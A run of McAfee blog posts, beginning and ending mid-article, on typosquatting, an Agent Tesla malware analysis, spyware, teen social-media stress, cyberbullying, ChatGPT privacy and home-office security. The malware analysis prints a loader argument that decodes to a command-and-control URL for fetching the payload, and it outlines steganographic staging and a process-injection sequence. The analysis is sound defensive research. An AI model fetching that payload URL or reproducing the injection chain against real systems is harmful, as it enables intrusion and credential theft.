Further, scammers have gotten wise to the increased use of personal assistants to look up web addresses on phones and in homes. Typosquatting now includes soundalike names in addition to lookalike names. With that, they can capitalize when an assistant doesn’t quite hear a command properly.

How to protect yourself from typosquatting

No doubt, slip-ups happen when browsing. Yet you can minimize how often with a few steps—and give yourself an extra line of defense if a mistake still slips through.

• Whether you type in a web address to the address field, or a search engine, be careful that you spell the address correctly before you hit “return”.
• If you are going to a website where you might share private information, look for the green lock symbol in the upper left-hand corner of the address bar. This indicates that the site uses encryption to secure the data that you share.
• Be suspicious of websites with low-quality graphics or misspellings. These are telltale signs of fake websites.
• Consider bookmarking sites you visit regularly to make sure you get to the right site, each time.
• Don’t click on links in emails, text messages, and popup messages unless you know and trust the sender.
• Consider using a safe browsing tool such as McAfee Web Protection, which can help you avoid dangerous links, bad downloads, malicious websites, and more.​
• Always use comprehensive online protection software like ours on your computers and devices to protect you from malware and other online threats.

The post How Typosquatting Scams Work appeared first on McAfee Blog.

Authored by Yashvi Shah

Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.

Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.

The following heat map shows the current prevalence of Agent Tesla on field:

Figure 1: Agent Tesla heat map

McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.

Technical Analysis

The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.

Figure 2: Infection Chain

VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.

Figure 3: Process Tree

First PowerShell command

The first PowerShell command is encoded as illustrated here:

Figure 4: Encoded First PowerShell

Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:

Figure 5: Decoded content

Second PowerShell Command

The deciphered content serves as the parameter passed to the second instance of PowerShell..

Figure 6: Second PowerShell command

Deconstructing this command line for clearer comprehension:

Figure 7: Disassembled command

Steganography

As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:

Figure 8: Downloaded image

This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.

Figure 9: Steganography

After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.

Figure 10: DLL obtained from steganography

Process Injection into RegAsm.exe

This DLL serves two purposes:

1. Downloading and decoding the final payload
2. Injecting it into RegAsm.exe

Figure 11: DLL loaded

In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:

$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)

The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:

http://195.178.120.24 /castrnewbaze64.txt

Figure 12: Request for payload

Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.

Figure 13: Downloaded text file

In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.

Figure 14: Final payload

In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:

“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.

Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.

Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:

Figure 15: Process Injection

By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,

“kern!”.Replace(“!”, “el32”)  à  kernel32

Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx

As a result, these functions translate into the subsequent API calls:

1. CreateProcessA : This API call is typically employed to initiate the creation of a new process, rather than for process injection. In the context of process injection, the focus is generally on targeting an existing process and injecting code into it.
2. VirtualAllocEx: This is often used in process injection to allocate memory within the target process to host the injected code.
3. ReadProcessMemory: This is used to read the memory of a target process. It is typically used in reflective DLL injection to read the contents of a DLL from the injector’s memory and write it into the target process.
4. GetThreadContext: This API is used to retrieve the context (registers, flags, etc.) of a thread within a target process. It’s useful for modifying thread execution flow during injection.
5. Wow64GetThreadContext: This is like GetThreadContext, but it’s used when dealing with 32-bit processes on a 64-bit system.
6. SetThreadContext: This API is used to set the context of a thread within a target process. This can be useful for modifying the execution flow.
7. Wow64SetThreadContext: Like SetThreadContext, but for 32-bit processes on a 64-bit system.
8. ZwUnmapViewOfSection: This is used to unmap a section of a process’s virtual address space, which could potentially be used to remove a DLL loaded into a target process during injection.
9. WriteProcessMemory: This is used to write data into the memory of a target process. It’s commonly used for injecting code or data into a remote process.
10. ResumeThread: This is used to resume the execution of a suspended thread, often after modifying its context or injecting code.

Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.

The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:

Figure 16: Obfuscation

Collection of data:

Fingerprinting:

Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:

• Computer Name
• IP information
• Win32_baseboard
• Serial number
• win32_processor
• processorID
• Win32_NetworkAdapterConfiguration
• MacAddress

Web Browsers:

Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.

Figure 17: Opera browser

Figure 18: Yandex browser

Figure 19: Iridium browser

Figure 20: Chromium browser

Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:

Figure 21: User data retrieval from all browsers -1

Figure 22: User data retrieval from all browsers – 2

Mail Clients:

Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:

Figure 23: Mail clients

Exfiltration:

Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.

The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.

Figure 24: Function calls made for exfiltration.

This is the procedure by which functions are invoked to facilitate data extraction via SMTP:

1. A specific value is provided as a parameter, and this value is processed within the functions. As a result, it ultimately determines the port number to be utilized for SMTP communication. In this case, port number 587 is used for communication.

Figure 25: Port number

2. Next, the malware retrieves the hostname of the email address it intends to utilize i.e., corpsa.net.

Figure 26: Domain retrieval

3. Subsequently, the email address through which communication is intended to occur is revealed.

Figure 27: Email address used

4. Lastly, the password for that email address is provided, so that attacker can log in and can start sending out the data.

Figure 28: Password

The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.

Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.

Summary:

The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.

Indicators of compromise (IoC):

Table 1:Indicators of Compromise

The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.

Spyware, a name that cunningly blends “spying” and “software,” is a dangerous class of invasive programs that stealthily operate on your computer. They monitor and record your activities, thus posing a significant threat to your digital privacy, security, and identity. Spyware can lead to identity theft if your personal or financial data falls into the wrong hands. This guide provides in-depth information about spyware, how it works, and how to prevent it from infecting your computer system.

What Is Spyware?

Spyware is a type of malicious software that collects information about users without their knowledge. It can track every action, from keystrokes to browsing habits, thus presenting a grave threat to user privacy and security.

Designed to be stealthy and elusive, spyware can record every keystroke, capture screenshots, and even record audio and video, making it a potent tool for cybercriminals. It is often transmitted through free downloads, file-sharing programs, or deceptive links and websites.

Spyware – A Legal and Illegal Aspects

In certain situations, spyware is perfectly legal. For example, when the owner of the computer installs and uses the software, it’s considered legal. Parents might install spyware to monitor their children’s online activities or employers to oversee their employees’ productivity.

However, when someone installs spyware on a computer without the owner’s consent, it becomes illegal. Cybercriminals often disguise spyware as legitimate programs or embed them in websites, tricking users into downloading or clicking, resulting in the stealthy installation of spyware.

→ Dig Deeper: Malware Hides in Installer to Avoid Detection

Common Forms of Spyware

Spyware can take several shapes and forms, and its diversity makes it even more dangerous. A common form of spyware is a keylogger or a keycatcher. This hardware can be attached to a computer to capture and record keystrokes. This device can monitor user activity without being detected by typical anti-spyware software.

Spyware can also come in the form of a computer virus. When users click on a malicious link or download a corrupted program, they unknowingly install spyware on their system. Once installed, the spyware works silently in the background, capturing and transmitting user data to the attacker.

Spyware’s pervasive threat extends beyond computers and laptops; it can also manifest as mobile spyware. Mobile spyware operates similarly to its desktop counterparts but is tailored to exploit the unique characteristics of mobile platforms. Cybercriminals often employ various tactics to deliver mobile spyware–through application stores like Google Play and App Store, phishing attacks, or physical access.

→ Dig Deeper: Mobile Spyware: How Hackers Can Turn Your Phone Into a Stalking Machine

The adaptability and constantly evolving nature of spyware make it a persistent menace in the digital landscape. Its ability to take on various forms and exploit vulnerabilities underscores the importance of proactive cybersecurity measures.

Impact of Spyware on Identity Theft

The impact of spyware on identity theft cannot be understated. By stealthily recording sensitive personal and financial information, like usernames, passwords, and credit card numbers, it presents a significant risk to a user’s identity.

Stolen data can be used for various malicious activities, including unauthorized purchases, opening credit accounts, and even creating a complete identity theft. The consequences of these activities can be financially devastating and may take a significant amount of time and effort to recover from.

McAfee Pro Tip: Identity theft remains a significant problem in the United States, and there is no sign of it diminishing soon. Reports of fraud consistently indicate a continuous increase in the occurrences of identity theft in the U.S. Read the latest Identity Theft statistics.

Preventing Spyware Infections

Preventing spyware from infecting your system starts with practicing good online habits. Avoid downloading files from untrusted sources, especially torrents and software cracks notorious for being riddled with spyware. Also, be wary of pop-ups. Never click “Agree,” “OK,” “No,” or “Yes” in a pop-up, as these actions can trigger an automatic spyware download. Instead, close the pop-up by hitting the red X or shutting down your browser altogether.

Regularly updating your operating system’s security patches is another good practice. These patches often contain fixes to known vulnerabilities that spyware and other malicious programs exploit. Also, ensure to download and use your web browser’s latest, most secure version. Running reputable anti-malware programs, like McAfee Total Protection, which includes spyware removal, can help to detect and remove spyware from your system.

→ Dig Deeper: How to Live a Digital Life Free of Spyware

Dealing with Spyware Infections

If you suspect your system is infected with spyware, you must act swiftly. Use a trusted antivirus program to run a system scan. If spyware is detected, the program should be able to quarantine and remove it. However, some forms of spyware are advanced and may be able to avoid detection. In such instances, it may be necessary to engage a professional to clean your system.

Part of dealing with a spyware infection is mitigating its potential effects. If your sensitive data has been compromised, consider implementing measures to protect your identity. McAfee Identity Protection provides proactive identity surveillance, which monitors your credit and personal information for fraudulent activities. If any such activity is detected, it offers access to live fraud resolution agents, who can help you resolve identity theft issues.

→ Dig Deeper: How to Wipe Out a Computer Virus

Conclusion

Spyware significantly threatens your digital identity, privacy, and security. It stealthily operates in the background, recording and transmitting your activities and personal information. While it can be a valuable tool for legal monitoring, its misuse by cybercriminals cannot be underestimated. Preventing and dealing with spyware requires vigilance, good online habits, and the use of trusted antivirus programs like McAfee Antivirus. Protecting your digital identity is not a one-time task but an ongoing process. Stay informed, stay updated, and stay safe.

The post Spyware: A Major Identity Theft Threat appeared first on McAfee Blog.

Handling Social Media Stress for Teens

In today’s world, most communication happens through the internet, facilitated by numerous applications. The web is a lively center filled with various activities such as news, videos, education, blogs, gaming, activism, and entertainment. Notably, social media apps have morphed into the digital meeting points for netizens. Our society is undeniably superbly interconnected, and our digital persona is greatly treasured.

However, this isn’t always beneficial, especially for teenagers who may be overwhelmed by the deluge of information, leading to stress. Stress is a common part of our daily lives, emerging from our education, employment, relationships, and surroundings. A similar situation transpires online. In fact, we tend to cope with stress by expressing our frustrations, confronting problems directly, or evading the issue altogether. Yet, the ways to cope with stress in the virtual world differ. Online stress can arise from unique triggers, and its repercussions can rapidly escalate and proliferate at an alarming rate.

Causes of Social Media Stress in Children

The rise of social media has brought a concerning phenomenon – social media stress in children. As these young individuals navigate the complex virtual world, they often encounter a range of stressors that can significantly impact their emotional and psychological well-being. Understanding these underlying causes is a crucial step in addressing and mitigating the adverse effects of social media on our younger generations. Let’s delve into the causes of social media stress in children and shed light on the various factors that contribute to this growing issue:

• Peer pressure: The most important reason children are online is to connect with friends. To keep this friendship alive and kicking, they often blindly copy the group leaders, even if they are uncomfortable with their actions.
• FOMO (Fear of Missing Out): Teens, especially girls, have a competitive spirit when it comes to online presence and don’t want to be ‘the last to know’ so, they end up spending a lot of time online.
• Keeping up with the Jones’: The same competitive spirit leads kids to spend hours posing and selecting the perfect pics to share online or seek approval from strangers. This is risky, as negative comments online can harm self-confidence.

Other Triggers of Social Media Stress

Besides the more obvious and well-documented sources of social media stress in children, there exist several other significant triggers that contribute to the overall stress levels experienced by young individuals in the digital age, and these may include:

• Excessive sharing: When kids share a lot of their private information on social media, they leave themselves vulnerable to hacking and open themselves up to contact from inappropriate individuals online.

→ Dig Deeper: The Ultimate Guide to Safe Sharing Online

• Cyberbullying: Most kids have witnessed or experienced some form of cyberbullying and often end up as either perpetrators or victims, or mute spectators. In all cases, this is a disturbing occurrence.

→ Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report

• Lack of screen time limits and lack of empathy: Lack of digital balance can have psychological effects, so digital usage rules are necessary. Similarly, when children are not taught to respect others and their traditions, they do not develop empathy and may bully those with differing views and lifestyles.

→ Dig Deeper: 5 Screen Time Principles to Establish When Your Kids are Still Babies

The Role of Parenting

Parenting plays a major role in helping children learn how to tackle social media stress. As parents, you know your children the best. Yes, even teens. Observe them, and if you note any change in their social media habits or general behavior, talk to them. The earlier you start having frank one-to-one conversations, the easier it will be for you later. But before that, you may need to modify your response to stress and learn to control your reactions. That way, you will teach them a very important lesson without using a single word.

Helping Kids Fight Social Media Stress

Children can learn to manage social media stress by developing a healthy online etiquette and creating boundaries for their online activities. Encourage them to accept differences and realize that people have varied opinions. Remind them not to make judgments based on someone’s online bio and pictures and to understand that life isn’t a bed of roses for anyone. Another important step is to help them understand how important it is to respond tactfully when things get heated online. It’s essential that they understand the power of choosing not to engage in online altercations. Being silent doesn’t mean they’re weak but smart enough not to get provoked. If any online situation becomes too intense, they should be encouraged to report and block the perpetrator immediately.

McAfee Pro Tip: Since each child’s level of maturity and cognitive capacity to manage online challenges varies, a one-site-fits-all approach to balancing social media and mental health won’t work for everyone. Find tips on how to find the best method for your child.

Practicing Digital Balance and Awareness

One of the keys to managing stress caused by social media is ensuring that kids practice digital balance. Set screen time limits and encourage them to make and maintain friendships in the real world. In-person interactions promote emotional growth and provide a well-rounded social experience. Moreover, it’s crucial to instill the idea that maturity is about staying true to their values and wisdom lies in identifying the negatives and avoiding them. Just as they would in the physical world, they should be aware that the digital world comprises both good and bad elements. This awareness can help them navigate online spaces safely. Let them know the importance of applying their real-life values in the digital world and the mantra of STOP, THINK, CONNECT, should always be in their mind before posting anything online.

→ Dig Deeper: 6 Steps to Help Your Family Restore Digital Balance in Stressful Times

Conclusion

In conclusion, parents play a crucial role in helping their children tackle social media stress. By observing their kids’ behavioral changes, having open conversations, and setting appropriate boundaries for their online activities, parents can help their kids navigate the digital world safely. Encouraging children to accept differences, practice tact, maintain digital balance, and be aware of the good and bad online can help alleviate the stress caused by social media. Ultimately, the goal is to create a healthier and happier online space for children, free from unnecessary stress.

Improve your digital parenting with McAfee’s Parental Controls. This security tool allows parents to monitor device usage, set limits on screen time, and even keep tabs on kids’ whereabouts.​

The post Handling Social Media Stress for Teens appeared first on McAfee Blog.

As we all look forward to the sunshine and freedom of summer, it’s important to remember that not all elements of the school year disappear with the ringing of the final bell. In our increasingly digital age, cyberbullying has become a pervasive issue that can affect kids even during their summer break. This guide will help parents understand the issue, recognize the signs, and provide practical strategies to protect their kids from cyberbullies.

The Reality of Summer Cyberbullying

Summer break should be a time of fun-filled days, exploration, relaxation, and a break from the rigors of the school year. However, with the increase in leisure time comes a corresponding increase in screen time, and, unfortunately, this often results in an uptick in instances of cyberbullying. As the McAfee survey in 2014 revealed, 87% of teenagers reported witnessing cyberbullying, a significant increase from the previous year. The reasons for being targeted varied, with appearance, race, religion, and sexual orientation all cited as factors. Given this reality, parents must remain vigilant during the summer months. Keeping an eye on your child’s online activities, encouraging open communication, and intervening when necessary can make the difference between a summer of fun and one of fear and isolation. → Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report

Things Not to Do

When confronted with bullying, our instinctive reactions aren’t always the best. Here are three things you should avoid doing when addressing cyberbullying:

• Telling your child to ignore the bullying. The nature of social media can amplify the impact of bullying, making it impossible to overlook simply.
• Blaming the child for being bullied. Even if your child made poor decisions or inadvertently instigated the situation, nobody deserves to be bullied.
• Encouraging physical retaliation. Fighting back can escalate the situation and put your child in physical or legal danger.

3 Ways to Avoid Bullying Online

Prevention is the best cure, and there are several proactive steps you can take to minimize the risk of your child being cyberbullied:

• Make profiles and photos private. Insist on privacy settings for all social profiles. This confines your child’s online circles to known friends, reducing the likelihood of cyberbullying.

→ Dig Deeper: Protecting Your Privacy on Social Media

• Avoid risky apps. Certain apps, like ask.fm, Kik Messenger, and Yik Yak, are associated with higher rates of cyberbullying due to their allowance of anonymous interaction. Ensure these are off-limits for your child.

→ Dig Deeper: Beware of Malicious Mobile Apps

• Don’t invite criticism. The online culture often encourages kids to seek approval through “likes” or “ranks” of their photos. Discuss the risks involved in this behavior and remind your child of their worth outside these superficial metrics.

3 Things to Do if Bullied Online

Despite taking precautions, there may be instances where cyberbullying can’t be immediately prevented. In such situations, it is crucial to know what steps to take to mitigate the impact and bring the bullying to an end:

• Tell someone. It’s important for the child to confide in a trusted adult, somebody who can help manage the situation appropriately. Encourage open communication from the start. Many times, kids withhold information about bullying, allowing it to escalate unchecked. Monitor your child’s online behavior discreetly, paying attention to the tone and content of their interactions. It’s also crucial to provide emotional support and reassurance to children who are being targeted, as they may be suffering from fear, embarrassment, or feelings of isolation.
• Save the evidence. Make sure to keep a record of bullying incidents – texts, emails, social media posts, or screenshot conversations. These might provide valuable information to address the situation and serve as evidence if the need to report to authorities arises.
• Report serious incidents to the police. If cyberbullying escalates to the point where it includes threats, intimidation, or any form of sexual exploitation, it’s time to involve the authorities. Report the situation to the police and specific social networks where bullying occurs. Websites such as StopBullying.gov provide comprehensive resources to understand your rights better and get the help you need.

Supporting Your Child

Addressing the issue of cyberbullying can be a complex task. The emotional wounds inflicted by this abuse can be deep and long-lasting. Therefore, it’s indispensable that your child feels supported and understood. Maintain an open line of communication with your child, creating a secure and trusting environment where they can comfortably express their feelings and fears. It might also be beneficial to seek professional help when dealing with cases of severe bullying. Therapy or counseling can provide your child with effective coping strategies, helping them regain their confidence and self-esteem. McAfee Pro Tip: While numerous aspects of the digital world remain beyond our control, one aspect where we wield significant influence is our commitment to protecting the well-being of our family members in both the digital and mental realms. Mental health always matters. Find ways to support your child online and offline.

Teaching Empathy and Respect Online

Preventing cyberbullying starts at home. By teaching our children the values of empathy and respect, we can contribute to a more positive online culture. Incorporate digital citizenship lessons into your everyday conversations, emphasizing the importance of treating others kindly offline and online. Teach your children to think before they post and remind them that behind every screen, there’s a real person who can be hurt by their words. Building respect and empathy can discourage cyberbullying and inspire children to stand against it. → Dig Deeper: Cyberbullying’s Impact on Both Society and Security

Conclusion

Parenting in the digital age brings with it new challenges and responsibilities. Cyberbullying is a significant issue that requires our attention and vigilance, especially during the summer when screen time increases. Equip your child with the right tools to protect themselves online, foster open communication at all times, and support them in the face of adversity. Remember, the goal is for our children to enjoy their digital interactions and have a safe, enjoyable summer free from the threat of cyberbullying. Improve your family’s digital habits, privacy, and safety with McAfee’s Parental Controls. This security tool allows parents to oversee device usage, establish screen time restrictions, and even track the locations of their children.

The post Help Kids Steer Clear of Cyberbullies During Summer Break appeared first on McAfee Blog.

How To Manage Your Privacy When Using ChatGPT or Other Generative AI

Love it or hate it, generative artificial intelligence (AI) and ChatGPT in particular have become one of the most talked about tech developments of 2023. Many of us have embraced it with open arms and have put it to work by tasking it to ‘assist’ with assignments, write copy for an ad, or even pen a love letter – yes, it’s a thing. Personally, I have a love/hate relationship with it. As someone who writes for a living, it does ‘grind my gears’ but I am a big fan of its ability to create recipes with whatever I can find in my fridge. But like any new toy, if you don’t use it correctly then there could be issues – which may include your privacy.

ChatGPT – A Quick Recap

ChatGPT is an online software program developed by OpenAI that uses a new form of artificial intelligence – generative AI – to provide conversational, human-style responses to a broad array of requests. Think of it as Google on steroids. It can solve maths questions, translate copy, write jokes, develop a resume, write code, or even help you prepare for a job interview. If you want to know more, check out my Parent’s Guide to ChatGPT.

But for ChatGPT to answer tricky questions and be so impressive, it needs a source for its ‘high IQ’. So, it relies on knowledge databases, open data sources and feedback from users. It also uses social media to gather information and a practice known as ‘web scraping’ to gather data from a multitude of sources online. And it is this super powerful combination that allows ChatGPT to ‘almost always’ deliver on tasks.

Why Does Generative AI Pose A Threat To My Privacy?

Your privacy can be affected in several ways. While I discuss some specifics on ChatGPT, similar concerns apply to other generative AI programs. Some of these ways may not concern you, but I’m quite sure some will. Here’s what you need to know:

1. ChatGPT May be Using Your Data Without Your Express Permission

When ChatGPT (along with many similar tools) absorbed the enormous amount of data it needed to function from sources like books, articles, and web pages, they did so without seeking case-by-case permission. As certain data can be used to identify us, our friends and family or even our location, this can present privacy concerns. Some authors have already filed complaints for usage of their content without compensation, despite ChatGPT offering users a premium package for US$20/month. Recently, many online news outlets have blocked OpenAI’s crawler which will limit ChatGPT’s  ability to access their news content.

2. Whatever You Share With ChatGPT Goes Into Its Data Bank

Every time you share a piece of information with ChatGPT, you are adding to its data bank, risking that the information ends up somewhere in the public domain. The Australian Medical Association (AMA) recently issued a mandate for Western Australian doctors not to use ChatGPT after doctors at a Perth hospital used it to write patient notes. These confidential patient notes could be used to not only further train ChatGPT but could theoretically also be included in responses to other users.

3. ChatGPT Collects A Lot Of Information About Its Users

In addition to collecting the information users share, it also collects detailed information about its users. In the company’s privacy policy, it outlines that it collects users’ IP addresses and browser types. It also collects information on the behaviour of its users e.g. the type of content that users engage with as well as the features they use. It also says that it may share users’ personal information with unspecified parties, without informing them, to meet their business operation needs.

4. Risk of a Data Breach

One of the biggest risks to using ChatGPT and similar generative AI is the risk that your details will be leaked in a data breach. Between 100,000 ChatGPT accounts credentials were compromised and sold on the Dark Web in a large data beach which happened between June 2022 to May 2023, according to Search Engine Journal.

But here’s another potential problem – as ChatGPT users can store conversations, if a hacker gains access to an account, it may mean they also gain access into propriety information, sensitive business information or even confidential personal information.

What’s ChatGPT Doing To Protect Privacy?

Now please don’t misunderstand me, ChatGPT is taking action to protect users but it may not be enough to truly protect your privacy.

ChatGPT does make it very clear that all conversations between a user and ChatGPT are protected by end-to-end encryption. It also outlines that strict access controls are in place so only authorised personnel can access sensitive user data. It also runs a Bug Bounty program which rewards ethical hackers for finding security vulnerabilities. However, in order to remain protected while using the app, I believe the onus is on the user to take additional steps to protect their own privacy.

So, What Can I Do To Protect My Privacy?

As we all know, nothing is guaranteed in life however there are steps you can take to minimise the risk of your privacy being compromised. Here are my top tips:

1. Be Careful What You Share With ChatGPT and Other Platforms

Never share personal or sensitive information in any of your prompts. By doing so, you increase the risk of sharing confidential data with cybercriminals. If you need a sensitive piece of writing edited, ask a friend!!

2. Consider Deleting Your Chat History

One of the most useful ways of safeguarding your privacy is to avoid saving your chat history. By default, ChatGPT stores all conversations between users and the chatbot with the aim of training OpenAI’s systems. If you do choose not to save your chat history, OpenAI will store your conversations for 30 days. Despite this, it is still one of the best steps you can take to protect yourself.

3. Stay Anonymous

As mentioned above, ChatGPT can collect and process highly sensitive data and associate it with your email address and phone number. So, why not set up a dedicated email just for ChatGPT? And keep your shared personal details to a minimum. That way, the questions you ask or content you share can’t be associated with your identity. And always use a pseudonym to mask your true identity.

4. Commit To Staying Up To Date

Whether it’s ChatGPT or Google’s Bard, it’s imperative that you stay up to date with the company’s privacy and data retention policies, so you understand how your data is managed. Find out how long your conversations will be stored for before they are anonymised or deleted and who your details could potentially be shared with.

So, if you’re looking for a recipe for dinner, ideas for an upcoming birthday party or help with a love letter, by all means get ChatGPT working for you. However, use a dedicated email address, don’t store your conversations and NEVER share sensitive information in the chat box. But if you need help with a confidential or sensitive issue, then maybe find another alternative. Why not phone a friend – on an encrypted app, of course!!

The post ChatGPT’s Impact on Privacy and How to Protect Yourself appeared first on McAfee Blog.

As of the writing of this article, the height of the pandemic seems like a distant but still vivid dream. Sanitizing packages, sparse grocery shelves, and video conferencing happy hours are things of the past for the majority of the population. Thank goodness.

A “new normal” society is adapting to today’s working culture. The work landscape changed significantly since 2020, and it might never return to what it once was. In 2022, workers spent an average 3.5 days in the office per week, which is 30% below the prepandemic in-office average.¹

The work-from-home movement is likely here to stay, to the joy of employees seeking a better work-life balance and flexibility; however, some responsibility does fall upon people like you to secure home offices to protect sensitive company information.

To make sure you’re not the weak cyber link in your company’s security, make sure to follow these three tips for a secure home office.

1. Lock Your Screen, Stow Your Device

When you’re not physically in front of your work computer, best practices dictate that you lock the screen or put your device to sleep. No matter how much you trust your family, roommates, or the trustworthy-looking person seated next to you at a café, your company device houses all kinds of corporate secrets. A stray glance from the wrong person could put that information’s secrecy in jeopardy. Plus, imagine your cat walking across your keyboard or a toddler mashing your mouse, deleting hours’ worth of work. Disastrous.

Then, when you’re done with work for the day, stow your device in a secure location, preferably a drawer with a lock. Even if your work computer is 10 times faster and sleeker than your personal laptop, keep each device in its designated sphere in your life: work devices only for work, personal devices only for personal activities.

2. Secure Your Home Wi-Fi

Wi-Fi networks that are not password protected invite anyone off the street to surf on your network and eavesdrop on your online activities. A stranger sneaking on to your home Wi-Fi could be dangerous to your workplace. There would be very little stopping a stranger from spying on your connected work devices and spreading confidential information onto the dark web or leaking company secrets to the media.

There are a few steps you can take to secure your home office’s internet connection. First, make sure to change the default name and password of your router. Follow password best practices to create a strong first defense. For your router name, choose an obscure inside joke or a random pairing of nouns and adjectives. It’s best to omit your address and your real name as the name of your router, because that could alert a cybercriminal that that network belongs to you. Better yet, you can hide your router completely from strangers and only make it searchable to people who know the exact name of your network.

For an additional layer of protection, connect to a virtual private network (VPN). Your company may offer a corporate VPN. If not, signing up for your own VPN is easy. A VPN encrypts the traffic coming in and going out of your devices making it nearly impossible for a cybercriminal to burst into your online session and see what’s on your screen.

3. Take Your Security Training Seriously

The scenarios outlined in your company’s security training may seem far-fetched, but the concepts of those boring corporate videos actually happen! For example, the huge Colonial Pipeline breach in 2021 originated from one employee who didn’t secure the company’s VPN with multifactor authentication (MFA).² Cutting small corners like disabling MFA – which is such a basic and easy-to-use security measure – can have dire consequences.

